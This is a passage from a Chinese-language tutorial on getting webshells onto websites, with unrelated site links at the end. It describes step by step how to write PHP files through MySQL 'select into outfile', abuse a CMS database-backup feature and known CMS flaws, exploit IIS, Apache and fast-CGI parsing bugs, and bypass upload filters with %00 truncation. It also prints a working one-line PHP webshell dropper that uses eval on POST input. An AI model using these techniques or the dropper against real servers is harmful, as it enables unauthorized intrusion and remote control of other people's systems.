MySQL:
select into outfile(dumpfile) //MySQL写文件命令
# 例如:
select "<?php echo 'test'; ?>" into outfile "F:\\www\\test.php";
文章插图
文章插图
那么其它关系数据库管理系统同样的原理写文件,就不在过多介绍了 。
3、数据库备份获取WebShell
对于这个方法,我遇见过得就是拿到管理员账号和密码之后是可以登录后台的,虽然存在上传的地方,但是只能是jpg图像,这个时候必须还得将它改成.asp后缀 。这里可以用到网站中的数据库备份漏洞 。在后台的"系统管理"中提供了"数据库备份"功能,我们可以将上传上去的图片文件作为要备份的数据库,然后利用可以指定备份文件名的漏洞,把备份后的文件改名成.asp后缀 。具体操作如下图所示 。
文章插图
成功备份之后,记下已更名的webshell文件的路径\wwwroot\admin\.\admin\webshell.asp 。
这里就成功地将webshell上传到了网站,输入URL:我们就可以访问这个网页了,由于他这个是个大马所以可以这样,我们一般的一句话木马没有任何内容,一般是使用中国菜刀进行连接 。
文章插图
4、CMS获取WebShell
什么是CMS?
CMS是Content Management System的缩写,意为"内容管理系统" 。内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场 。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解 。
常见的CMS有哪些?
asp平台:动易CMS、创力CMS、科汛CMS、新云CMS;
php平台:phpcms、织梦CMS、帝国CMS、php168 CMS;
ASP.NET平台:Zoomla!逐浪CMS、动易CMS、风讯CMS、We7 CMS;
CMS获取WebShell方法
公开漏洞途径:以PHPCMS为例:
我们可以利用搜索引擎来查找互联网上公开的通用漏洞,如果目标站点并没有进行修复,即可轻松获取WebShell 。
文章插图
代码审计途径:
有很多CMS其实是开源的,我们可以在官网下载到源码,然后进行代码审计,自己挖掘漏洞, 来获取WebShell 。
三、如何上传webshell1、解析漏洞上传
现在对于不同的web服务器系统对应的有不同的web服务端程序,windows端主流的有iis,linux端主流的有nginx 。这些服务对搭建web服务器提供了很大的帮助,同样也对服务器带来隐患,这些服务器上都存在一些漏洞,很容易被黑客利用 。
(1)iis目录解析漏洞
比如:/xx.asp/xx.jpg
虽然上传的是JPG文件,但是如果该文件在xx.asp文件夹下,那个iis会把这个图片文件当成xx.asp解析,这个漏洞存在于iis5.x/6.0版本 。
(2)文件解析漏洞
比如:xx.asp;.jpg 。在网页上传的时候识别的是jpg文件,但是上传之后iis不会解析;之后的字符,同样会把该文件解析成asp文件,这个漏洞存在于iis5.x/6.0版本 。
(3)文件名解析
比如:xx.cer/xx.cdx/xx.asa 。在iis6.0下,cer文件,cdx文件,asa文件都会被当成可执行文件,里面的asp代码也同样会执行 。(其中asa文件是asp特有的配置文件,cer为证书文件) 。
(4)fast-CGI解析漏洞
在web服务器开启fast-CGI的时候,上传图片xx.jpg 。内容为:
1 <?php fputs(fopen('shell.php','w'),'<?php eval($_POST[shell])?>');?>这里使用的fput创建一个shell.php文件,并写入一句话 。访问路径xx.jpg/.php,就会在该路径下生成一个一句话木马shell.php 。这个漏洞在IIS 7.0/7.5,Nginx 8.03以下版本存在 。语言环境:PHP,prel,Bourne Shell,C等语言 。
*注:fast-CGI是CGI的升级版,CGI指的是在服务器上提供人机交互的接口,fast-CGI是一种常驻型的CGI 。因为CGI每次执行时候,都需要用fork启用一个进程,但是fast-CGI属于激活后就一直执行,不需要每次请求都fork一个进程 。比普通的CGI占的内存少 。
(5)apache解析漏洞
apache解析的方式是从右向左解析,如果不能解析成功,就会想左移动一个,但是后台上传通常是看上传文件的最右的一个后缀,所以根据这个,可以将马命名为xx.php.rar,因为apache解析不了rar,所以将其解析为php,但是后台上传点就将其解析为rar,这样就绕过了上传文件后缀限制
2、截断上传
在上传图片的时候,比如命名1.asp .jpg(asp后面有个空格),在上传的时候,用NC或者抓到表单,将上传名asp后面加上%00(在burpsuite里面可以直接编辑HEX值,空格的HEX值为20,将20改为00),如果HEX为00的时候表示截断,20表示空格,如果表示截断的时候就为无视脚本中的JPG验证语句,直接上传ASP 。
秒懂生活扩展阅读
- xswl是什么意思
- ugly是什么意思英语怎么读音 ugly是什么意思
- reits是什么意思
- pu是什么材质的鞋子质量怎么样 pu是什么材质
- 885和996什么意思
- 分数线二段是什么意思
- 中南院是什么性质单位
- 屋面工程施工规范是什么
- 铠最高伤害出装和铭文是什么
- 合的反义词是什么